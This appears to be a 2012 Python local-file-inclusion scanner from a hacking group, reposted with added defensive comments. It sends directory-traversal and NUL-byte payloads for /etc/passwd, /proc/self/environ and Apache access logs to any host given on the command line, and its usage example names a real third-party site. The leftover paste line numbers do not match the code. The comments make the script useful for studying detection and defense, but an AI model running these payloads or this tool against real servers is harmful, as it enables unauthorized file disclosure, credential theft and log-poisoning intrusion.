parkdream1

scan ver 1.1.py

Apr 25th, 2012
  1. #!/usr/bin/python
  2. # Author: parkdream1
  3. # Messenger: h3x4r
  4. # (c) R00TW0RM - Private Community
  5. # https://r00tw0rm.com/
  6. # Local File Include Scaner Ver. 1.1
  7. # Greets: To all members of r00tw0rm !!
  8.  
  9. import socket,sys,re,random,time,httplib
  10. from random import choice
  11.  
# Candidate include paths for /etc/passwd.
# Layout of the table: the absolute path first, then the same file behind
# 1 to 13 leading "../" segments; the whole series is then repeated with a
# trailing "%00" (a URL-encoded NUL byte).
# Defensive note: both features are easy to match on the server side -- a run
# of "../" segments or a literal "%00" in a request URI is rarely legitimate.
# PHP has refused NUL bytes in filesystem paths since 5.3.4, so the "%00" half
# only matters on older runtimes.
passwd = list(
    prefix + "etc/passwd" + suffix
    for suffix in ("", "%00")
    for prefix in ("/",) + tuple("../" * depth for depth in range(1, 14))
)
  40.  
# Candidate include paths for /proc/self/environ (the environment block of the
# process that serves the request).
# Layout of the table: the absolute path first, then 1 to 14 leading "../"
# segments; the series is repeated with a trailing "%00".
# Defensive note: the environment of a web worker can hold credentials and
# request metadata, so a file-inclusion bug that reaches this path discloses
# more than a static file would.
environ = list(
    prefix + "proc/self/environ" + suffix
    for suffix in ("", "%00")
    for prefix in ("/",) + tuple("../" * depth for depth in range(1, 15))
)
  71.  
# Candidate include paths for six Apache access-log locations.
# Layout of the table, per log file and in this order: the absolute path, then
# 1 to 14 leading "../" segments, then the same 15 entries with a trailing
# "%00". 6 files x 30 entries = 180 strings.
# Defensive note: access logs contain text chosen by clients, so they should
# not be readable by the account the web application runs as, and must never
# be reachable through an include/require path.
logs = list(
    prefix + log_file + suffix
    for log_file in (
        "usr/local/apache2/logs/access_log",
        "var/log/apache2/access.log",
        "var/log/httpd/access_log",
        "var/log/httpd-access.log",
        "var/www/logs/access_log",
        "var/apache2/logs/access_log",
    )
    for suffix in ("", "%00")
    for prefix in ("/",) + tuple("../" * depth for depth in range(1, 15))
)
# NOTE(review): in the original table the deepest "%00" entry for
# var/www/logs/access_log ends in "%0", not "%00". It is reproduced here so
# that the list contents are unchanged.
logs[149] = logs[149][:-1]
  252.        
# Pool of browser User-Agent strings sent with the probe requests.
# Defensive note: several entries advertise platforms that were never shipped
# ("Windows NT 9.0", "Windows NT 7.1") and the first one has an unbalanced
# closing parenthesis, so the header is a usable, if weak, log heuristic.
user = [
    "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))",
    "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)",
    "Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0",
    "Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)",
    "Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; chromeframe/12.0.742.112)",
    "Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.11",
    "Opera/9.80 (X11; Linux i686; U; es-ES) Presto/2.8.131 Version/11.11",
    "Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/5.0 Opera 11.11",
]

# Chosen once at import time: every request of a run carries the same value.
agent = random.choice(user)
  265.  
def scanpasswd():
    """Request each entry of `passwd` and stop at the first passwd-like reply.

    Reads the module globals `target`, `port`, `path` (set by the
    ``__main__`` block) and `agent`. For every entry a new TCP connection is
    opened and a hand-written HTTP/1.0 GET for "/" + path + entry is sent.
    The complete reply, headers included, is read until the peer closes the
    connection and is searched for the literal "root:x:0:0:".

    The process exits on the first match and on any connection error; both
    cases use exit status 1, so the status does not tell them apart. One
    request is issued per second.

    Defensive notes: the traffic is one request per second from a single
    source with a fixed User-Agent and request URIs made of "../" runs or
    "%00", which is straightforward to alert on. The underlying flaw is
    closed by resolving the requested name and checking it against an
    allow-list of includable files rather than by filtering "../".
    """
    for candidate in passwd:
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((target, port))
            sock.send("GET /" + path + candidate + " HTTP/1.0\r\n")
            sock.send("Host: " + target + "\r\n")
            sock.send("User-Agent: " + agent + "\r\n\r\n")
            print("[*] Send Request Success")
            print("http://" + target + "/" + path + candidate)
            # HTTP/1.0 without keep-alive: read until recv() returns nothing.
            chunks = []
            chunk = sock.recv(1024)
            while len(chunk):
                chunks.append(chunk)
                chunk = sock.recv(1024)
            sock.close()
            fullpage = "".join(chunks)
        except Exception as e:
            print("[-] Cant Not Send Request")
            print(e)
            sys.exit(1)
        # The match runs over headers and body alike.
        if re.search("root:x:0:0:", fullpage):
            print("\033[32m[*] Request Vulnerability\n")
            sys.exit(1)
        print("[-] Request Is Not Vulnerability\n")
        time.sleep(1)
  293.  
def scanenviron():
    """Request each entry of `environ` and stop at the first environ-like reply.

    Reads the module globals `target`, `port`, `path` (set by the
    ``__main__`` block) and `agent`. For every entry a new TCP connection is
    opened and a hand-written HTTP/1.0 GET for "/" + path + entry is sent.
    The complete reply, headers included, is read until the peer closes the
    connection and is searched for the literal "HTTP_HOST".

    The process exits on the first match and on any connection error, with
    exit status 1 in both cases. One request is issued per second.

    Defensive notes: "HTTP_HOST" is a bare substring test, so any page that
    happens to print that text is reported as a hit. On the server side,
    requests whose URI names /proc/self/environ have no legitimate use and
    can be rejected or alerted on outright.
    """
    for candidate in environ:
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((target, port))
            sock.send("GET /" + path + candidate + " HTTP/1.0\r\n")
            sock.send("Host: " + target + "\r\n")
            sock.send("User-Agent: " + agent + "\r\n\r\n")
            print("[*] Send Request Success")
            print("http://" + target + "/" + path + candidate)
            # HTTP/1.0 without keep-alive: read until recv() returns nothing.
            chunks = []
            chunk = sock.recv(1024)
            while len(chunk):
                chunks.append(chunk)
                chunk = sock.recv(1024)
            sock.close()
            fullpage = "".join(chunks)
        except Exception as e:
            print("[-] Cant Not Send Request")
            print(e)
            sys.exit(1)
        # The match runs over headers and body alike.
        if re.search("HTTP_HOST", fullpage):
            print("\033[32m[*] Request Vulnerability\n")
            sys.exit(1)
        print("[-] Request Is Not Vulnerability\n")
        time.sleep(1)
  321.  
def scanlogs():
    """Request each entry of `logs` and stop at the first access-log-like reply.

    Reads the module globals `target`, `port`, `path` (set by the
    ``__main__`` block) and `agent`. Before the loop one "HEAD /" request is
    issued through httplib; the connection is created from `target` alone, so
    it goes to httplib's default port rather than `port`, and its response is
    never read. Each later reply is searched for the literal
    "HEAD / HTTP/1.1", i.e. the request line that HEAD would leave in an
    access log.

    The process exits on the first match and on any connection error, with
    exit status 1 in both cases. One request is issued per second.

    Defensive notes: a lone "HEAD /" followed by a burst of GETs whose URI
    names access_log / access.log is a recognisable sequence. Keeping log
    files unreadable to the application account removes the target of this
    check even where an inclusion bug exists.
    """
    marker_conn = httplib.HTTPConnection(target)
    marker_conn.request("HEAD", "/")
    for candidate in logs:
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((target, port))
            sock.send("GET /" + path + candidate + " HTTP/1.0\r\n")
            sock.send("Host: " + target + "\r\n")
            sock.send("User-Agent: " + agent + "\r\n\r\n")
            print("[*] Send Request Success")
            print("http://" + target + "/" + path + candidate)
            # HTTP/1.0 without keep-alive: read until recv() returns nothing.
            chunks = []
            chunk = sock.recv(1024)
            while len(chunk):
                chunks.append(chunk)
                chunk = sock.recv(1024)
            sock.close()
            fullpage = "".join(chunks)
        except Exception as e:
            print("[-] Cant Not Send Request")
            print(e)
            sys.exit(1)
        # The match runs over headers and body alike.
        if re.search("HEAD / HTTP/1.1", fullpage):
            print("\033[32m[*] Request Vulnerability\n")
            sys.exit(1)
        print("[-] Request Is Not Vulnerability\n")
        time.sleep(1)
  351.  
def menu():
    """Show the scan menu, read one choice from stdin and run it.

    Choices "1" to "3" announce and run the matching scan function and then
    exit; "4" exits directly. Any other input prints an error and shows the
    menu again by calling menu() recursively. Every exit uses status 1.
    """
    for line in (
        "Menu:\n",
        "ID [1]",
        "[Scan /etc/passwd File]\n",
        "ID [2]",
        "[Scan Environ File]\n",
        "ID [3]",
        "[Scan Access Logs File]\n",
        "ID [4]",
        "[Exit]\n",
    ):
        print(line)

    selection = raw_input("[*] Select ID For Start Scanner :")

    # Menu id -> (start message, scan routine).
    scans = {
        "1": ("Scan /etc/passwd File Starting ...\n", scanpasswd),
        "2": ("Scan /proc/self/environ File Starting ...\n", scanenviron),
        "3": ("Scan Access Logs File Starting ...\n", scanlogs),
    }
    if selection in scans:
        notice, run_scan = scans[selection]
        print(notice)
        run_scan()
        sys.exit(1)
    if selection == "4":
        print("Exiting...")
        sys.exit(1)

    print("Unknow Command\n")
    print("Please rechoice ID\n")
    menu()
  382.  
def banner():
    """Print the start-up banner, including the target host and port.

    Reads the module globals `target` and `port`, which the ``__main__``
    block assigns before calling this function.
    """
    frame = "****************************************************************************"
    for line in (
        "\n",
        frame,
        "||                         Local File Include Scaner Ver. 1.1             ||",
        "||                                 by parkdream1                          ||",
        "||                        (c) R00TW0RM - Private Community                ||",
        "                    Fucking from " + target + " on port " + str(port),
        frame,
        "\n",
    ):
        print(line)
  392.  
if __name__ == '__main__':
    # Exactly three arguments are expected: host, port and the request path
    # prefix that each candidate file name is appended to.
    if len(sys.argv) != 4:
        sys.stderr.write(" ".join(["Usage:", sys.argv[0], "<Target IP> <Port> <Path>"]) + "\n")
        print(" ".join(["Example: python", sys.argv[0], "playerstage.sourceforge.net 80 " + '"index.php?src="']))
        sys.exit(1)

    # These become the module globals read by banner() and the scan functions.
    # The port must parse as an integer; host and path are used as given and
    # are concatenated unescaped into the request line.
    port = int(sys.argv[2])
    target = sys.argv[1]
    path = sys.argv[3]

    banner()
    menu()